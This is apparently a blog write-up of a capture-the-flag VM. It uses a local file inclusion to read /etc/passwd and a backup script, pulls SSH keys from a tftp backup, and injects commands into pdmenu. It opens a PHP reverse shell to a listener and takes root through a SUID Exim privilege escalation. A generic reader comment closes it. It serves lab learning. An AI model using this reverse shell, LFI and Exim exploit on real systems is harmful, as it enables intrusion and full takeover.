The main point I think, is to pay attention to details. It is most important.
Ok let's start:
Nmap scan report for 172.16.3.4 Host is up (0.00099s latency). Not shown: 97 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql MAC Address: 00:0C:29:01:7F:D6 (VMware)
In web application we find straitforward LFI:
http://10.0.0.1/index.php?page=/etc/passwd
Shows us two interesting rows:
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu (next challenge?) backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
Let's see backup.sh script:
http://172.16.3.4/index.php?page=/usr/local/scripts/backup.sh
#Backup directories in /backups so we can get it via tftp echo "Backing up data" tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
Seems that tftp server running.
tftp> get backup.tar Received 1824718 bytes in 0.3 seconds tftp> exit tar xvf backup.tarDigging in backups...
admin.php is sql injection trolling so there is no sql injection
/home/paul/keys/ : a lot of private/public keys pairs found
working key:
ssh -i id_key4 paul@pluck
In all options, arbitrary command can be executed via $(id).
Using php reverse shell one liner:
$(php -r '$sock=fsockopen("10.0.0.1",80);exec("/bin/sh -i <&3 >&3 2>&3");')
and listener:
nc -lvp 80 Listening on [0.0.0.0] (family 0, port 80) Connection from [10.0.0.1] port 80 [tcp/http] accepted (family 2, sport 53278) $ id uid=1002(paul) gid=1002(paul) groups=1002(paul)Finding for SUID files:
find / -perm -4000 -ls 2>/dev/null
Reveal us a vulnerable Exim application:
153966 1024 -rwsr-xr-x 1 root root 1046368 Jan 18 08:54 /usr/exim/bin/exim-4.84-7
Exploit is very simple and trivial to use, also you may find a hint in .viminfo file
Seems to be Exim local privilege escalation testing and the author forgot to clean it properly :)
-' 1 0 /tmp/asdf.pm -' 4 0 /tmp/test.pmLet's try:
exploit-database: 39535
...snip $ PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps id uid=0(root) gid=1002(paul) groups=1002(paul) $ cd /root $ ls flag.txt $ cat flag.txt Congratulations you found the flag --------------------------------------- ###### (((((((((((((((((((((((((((((( ######### ((((((((((((((((((((((((((( ,,########## (((((((((((((((((((((((( @@,,,########## ((((((((((((((((((((( @@@@@,,,########## @@@@@@@@,,,############################ @@@@@@@@@@@,,,######################### @@@@@@@@@,,,########################### @@@@@@,,,########## @@@,,,########## &&&&&&&&&&&&&&&&&&&& ,,,########## &&&&&&&&&&&&&&&&&&&&&&& ########## &&&&&&&&&&&&&&&&&&&&&&&&&& ####### &&&&&&&&&&&&&&&&&&&&&&&&&&&&&Cool :)
Uptime: 45 min
Thank you very much for sharing security roundup that will make me able to get best knowledge about the things that I did not know before.
ReplyDelete